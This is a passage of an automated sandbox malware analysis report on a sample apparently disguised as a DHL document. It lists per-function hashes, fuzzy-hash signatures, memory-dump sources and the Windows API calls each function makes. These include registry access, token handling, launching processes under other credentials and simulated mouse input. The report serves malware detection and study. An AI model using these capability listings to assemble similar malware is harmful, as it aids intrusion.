                                                                                  • Opcode ID: 78331897f83ccfc4e46c9979a0c5bda8ab12fc804465c8ef96a922d98fc3caf4
                                                                                  • Instruction ID: 7241f2dc5ea4287ee4f2dbb09eee557b03eb32adfa16dd1ea0891b0dd59d2fc9
                                                                                  • Opcode Fuzzy Hash: 78331897f83ccfc4e46c9979a0c5bda8ab12fc804465c8ef96a922d98fc3caf4
                                                                                  • Instruction Fuzzy Hash: CA1190B2114219BFEF159FA5CC85EEB7F6DEF48768F014115BB04A2090C772AC21DBA0
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008F4292,?), ref: 008F41E3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 008F41EA
                                                                                  • EncodePointer.KERNEL32(00000000), ref: 008F41F6
                                                                                  • DecodePointer.KERNEL32(00000001,008F4292,?), ref: 008F4213
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoInitialize$combase.dll
                                                                                  • API String ID: 3489934621-340411864
                                                                                  • Opcode ID: 293a392d95c8caf67bf91bfa1eda11eb273fe6dbd0bdc8ed006bbd50eec10998
                                                                                  • Instruction ID: cb1a9d7d4a3f6578c7ec438bc82c37105aba5963ea12667d71712f28e8e292da
                                                                                  • Opcode Fuzzy Hash: 293a392d95c8caf67bf91bfa1eda11eb273fe6dbd0bdc8ed006bbd50eec10998
                                                                                  • Instruction Fuzzy Hash: E2E01AB06BC700AFEB216BBAEC29F153AA4F760757F504436B522D50E0DBB54096AF00
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008F41B8), ref: 008F42B8
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 008F42BF
                                                                                  • EncodePointer.KERNEL32(00000000), ref: 008F42CA
                                                                                  • DecodePointer.KERNEL32(008F41B8), ref: 008F42E5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                  • API String ID: 3489934621-2819208100
                                                                                  • Opcode ID: 96396605e42c14df6fb3b771f17121169c851a19d1c0ab93773f0ee4ef9b043d
                                                                                  • Instruction ID: 8c24f56cba16ab32d6949d6035112c49b12526ab5c0cdc827b11f5a763e543ec
                                                                                  • Opcode Fuzzy Hash: 96396605e42c14df6fb3b771f17121169c851a19d1c0ab93773f0ee4ef9b043d
                                                                                  • Instruction Fuzzy Hash: CEE012785AD700ABEA21AB36EC18F023AA4B73079AF100036F105E20B0CBB04541EB08
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3253778849-0
                                                                                  • Opcode ID: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
                                                                                  • Instruction ID: f35fb2ae296d3f5e98ecfe5ec2cc4cb5bb276deac6ce40353c2ad024c0cbef86
                                                                                  • Opcode Fuzzy Hash: cb1dd912e883e8d9c29446e36cc817b48adc01cf96968c0a1b7864e8d4a650fe
                                                                                  • Instruction Fuzzy Hash: 3B619E3050065AABCF11EF28C895FFE7BA9FF44318F04861AF9959B292DB349941CB52
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950548
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00950588
                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009505AB
                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009505D4
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00950617
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00950624
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4046560759-0
                                                                                  • Opcode ID: 43ac15ea9a102ecb0894f83276ec44a90714b094dae0c5792b78577b5d2151a3
                                                                                  • Instruction ID: 2aa46fb912f62add0161c2df0999fd948767cd5eed17b567bfaab6462bef832e
                                                                                  • Opcode Fuzzy Hash: 43ac15ea9a102ecb0894f83276ec44a90714b094dae0c5792b78577b5d2151a3
                                                                                  • Instruction Fuzzy Hash: 9D513A31108200AFCB14EF29D895E6ABBE8FF85315F04491EF995972A1EB31E909DB52
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 00955A82
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00955AB9
                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00955AE1
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00955B50
                                                                                  • GetSubMenu.USER32(?,?), ref: 00955B5E
                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00955BAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                  • String ID:
                                                                                  • API String ID: 650687236-0
                                                                                  • Opcode ID: cacd89259e3dd691f5a93f01ebe79a02a994491698009788865141ee17e80a05
                                                                                  • Instruction ID: 0e8ff3a8d07144d79c67b4fc80e3523580a80556d30f9737406988b1b4a6d099
                                                                                  • Opcode Fuzzy Hash: cacd89259e3dd691f5a93f01ebe79a02a994491698009788865141ee17e80a05
                                                                                  • Instruction Fuzzy Hash: DA517C31A00619EFCF11EFA5C855AAEBBB4FF48321F11446AED01A7352DB34AE458B91
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 0092F3F7
                                                                                  • VariantClear.OLEAUT32(00000013), ref: 0092F469
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 0092F4C4
                                                                                  • _memmove.LIBCMT ref: 0092F4EE
                                                                                  • VariantClear.OLEAUT32(?), ref: 0092F53B
                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0092F569
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1101466143-0
                                                                                  • Opcode ID: df30a1f9bbef558cf682f4ff47a7fe8b9444363e3bac0d2c1d3464e71d317bfc
                                                                                  • Instruction ID: 92769d2c883e08054995728610082c6abd8387facbc067a62fb8e9e522e10015
                                                                                  • Opcode Fuzzy Hash: df30a1f9bbef558cf682f4ff47a7fe8b9444363e3bac0d2c1d3464e71d317bfc
                                                                                  • Instruction Fuzzy Hash: 7D5167B5A00219AFCB10DF58D894EAAB7B8FF48314B158569F959DB314D730E911CBA0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00932747
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932792
                                                                                  • IsMenu.USER32(00000000), ref: 009327B2
                                                                                  • CreatePopupMenu.USER32 ref: 009327E6
                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00932844
                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00932875
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3311875123-0
                                                                                  • Opcode ID: b72b28ab1aad7cc8b12ec8b3deeed67e2d3848cec91f6f2910d0871efdcde405
                                                                                  • Instruction ID: e85b34f5e612faa4cae7f1e346d728e30ff3d9b82e0026410b22cca28a313f10
                                                                                  • Opcode Fuzzy Hash: b72b28ab1aad7cc8b12ec8b3deeed67e2d3848cec91f6f2910d0871efdcde405
                                                                                  • Instruction Fuzzy Hash: 00519B70A0430AEFDF25CF68D888BAEBBF9BF44314F104669E911AB291E7709945CF51
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 008D179A
                                                                                  • GetWindowRect.USER32(?,?), ref: 008D17FE
                                                                                  • ScreenToClient.USER32(?,?), ref: 008D181B
                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008D182C
                                                                                  • EndPaint.USER32(?,?), ref: 008D1876
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                  • String ID:
                                                                                  • API String ID: 1827037458-0
                                                                                  • Opcode ID: edf1197478b1c948c94bda92e44a3a9e90a8a07f4cdc890664f597ac37db7a2f
                                                                                  • Instruction ID: 718dac23d1c991d497a593184a8fd1be7c01433d6df58ddde113e87ba615dbfd
                                                                                  • Opcode Fuzzy Hash: edf1197478b1c948c94bda92e44a3a9e90a8a07f4cdc890664f597ac37db7a2f
                                                                                  • Instruction Fuzzy Hash: B4418171218305AFDB10DF2ADC88B7A7BE8FF45724F14066AF554C72A1C7319845EB62
                                                                                  APIs
                                                                                  • ShowWindow.USER32(009967B0,00000000,00E257D0,?,?,009967B0,?,0095B862,?,?), ref: 0095B9CC
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0095B9F0
                                                                                  • ShowWindow.USER32(009967B0,00000000,00E257D0,?,?,009967B0,?,0095B862,?,?), ref: 0095BA50
                                                                                  • ShowWindow.USER32(00000000,00000004,?,0095B862,?,?), ref: 0095BA62
                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0095BA86
                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0095BAA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 642888154-0
                                                                                  • Opcode ID: 633f58ec7066f84bea06bffcf88a0cf5900f210440e05b4c39c57df767088407
                                                                                  • Instruction ID: 01d2c56cb506be7b6aa89333d30ec64a300ccb85e6b7dc5d02878d98ed7b3a1a
                                                                                  • Opcode Fuzzy Hash: 633f58ec7066f84bea06bffcf88a0cf5900f210440e05b4c39c57df767088407
                                                                                  • Instruction Fuzzy Hash: 16416230604645AFDB22CF16C499B957BE4FF05316F5842B9FE488F2A2C731A849DB51
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00945134,?,?,00000000,00000001), ref: 009473BF
                                                                                    • Part of subcall function 00943C94: GetWindowRect.USER32(?,?), ref: 00943CA7
                                                                                  • GetDesktopWindow.USER32 ref: 009473E9
                                                                                  • GetWindowRect.USER32(00000000), ref: 009473F0
                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00947422
                                                                                    • Part of subcall function 009354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E
                                                                                  • GetCursorPos.USER32(?), ref: 0094744E
                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009474AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4137160315-0
                                                                                  • Opcode ID: f21c79d161c03aac5c41c7f4f52649cf260fbf07dd44c9cad00c0a203621acc3
                                                                                  • Instruction ID: 84a33562c709011568c2678e0bec0cd7ce390791ed3371945c5aa530ad6104ff
                                                                                  • Opcode Fuzzy Hash: f21c79d161c03aac5c41c7f4f52649cf260fbf07dd44c9cad00c0a203621acc3
                                                                                  • Instruction Fuzzy Hash: 4031D572509309AFD720DF55D849FABBBEAFF88314F004919F58997191D730EA09CB92
                                                                                  APIs
                                                                                    • Part of subcall function 009285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00928608
                                                                                    • Part of subcall function 009285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00928612
                                                                                    • Part of subcall function 009285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00928621
                                                                                    • Part of subcall function 009285F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00928628
                                                                                    • Part of subcall function 009285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092863E
                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00928977), ref: 00928DAC
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00928DB8
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00928DBF
                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00928DD8
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00928977), ref: 00928DEC
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00928DF3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                  • String ID:
                                                                                  • API String ID: 3008561057-0
                                                                                  • Opcode ID: d83888666d1ab695550a74c1cc815a10fdbd2b0207b9d5679c07286943de3979
                                                                                  • Instruction ID: 0fc38eb1ed93206e3ac73cd04b0e172127d55213fa13ab66499d29d472c87c9d
                                                                                  • Opcode Fuzzy Hash: d83888666d1ab695550a74c1cc815a10fdbd2b0207b9d5679c07286943de3979
                                                                                  • Instruction Fuzzy Hash: F611EE31516615FFDB109FA5EC18BAF7BADEF55326F108029F84593294CB32A908DB60
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00928B2A
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00928B31
                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00928B40
                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00928B4B
                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00928B7A
                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00928B8E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                  • String ID:
                                                                                  • API String ID: 1413079979-0
                                                                                  • Opcode ID: b789e5f1dc6c4ee465f56e4f966ee23b3177f2b40af34442da644b4981393134
                                                                                  • Instruction ID: bfa3f92b95002f4fce24764d3ad021f3b69f3afd6804c12759869760269cf51f
                                                                                  • Opcode Fuzzy Hash: b789e5f1dc6c4ee465f56e4f966ee23b3177f2b40af34442da644b4981393134
                                                                                  • Instruction Fuzzy Hash: 261159B2505209ABDF018FA5ED49FEB7BADEF08315F044068FE04A2160C7768D60AB60
                                                                                  APIs
                                                                                    • Part of subcall function 008D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
                                                                                    • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D135C
                                                                                    • Part of subcall function 008D12F3: BeginPath.GDI32(?), ref: 008D1373
                                                                                    • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D139C
                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0095C1C4
                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 0095C1D8
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095C1E6
                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 0095C1F6
                                                                                  • EndPath.GDI32(00000000), ref: 0095C206
                                                                                  • StrokePath.GDI32(00000000), ref: 0095C216
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                  • String ID:
                                                                                  • API String ID: 43455801-0
                                                                                  • Opcode ID: a06190fbf9f8491361c0119430b8db034d3fa22e84ed58e34d3013eb21a72579
                                                                                  • Instruction ID: 7631ae9aab7f6467f48126c4cc4fcca64c642a5a93fc7ea8deb06e4eae5374e2
                                                                                  • Opcode Fuzzy Hash: a06190fbf9f8491361c0119430b8db034d3fa22e84ed58e34d3013eb21a72579
                                                                                  • Instruction Fuzzy Hash: DC111E7640820CBFDF119F96DC48E9A7FADEF04365F048061B918861A1D7729D55EBA0
                                                                                  APIs
                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F03D3
                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 008F03DB
                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F03E6
                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F03F1
                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 008F03F9
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008F0401
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 4278518827-0
                                                                                  • Opcode ID: 97723496fea2b7f950df184d99432f972522807f63507749ef768fe358c42002
                                                                                  • Instruction ID: ebbae5c9f9b1315f16270a8ddf1aaf284ae5189a378a817feee3d88da7310b22
                                                                                  • Opcode Fuzzy Hash: 97723496fea2b7f950df184d99432f972522807f63507749ef768fe358c42002
                                                                                  • Instruction Fuzzy Hash: 42016CB09027597DE3009F5A8C85B52FFE8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0093569B
                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009356B1
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 009356C0
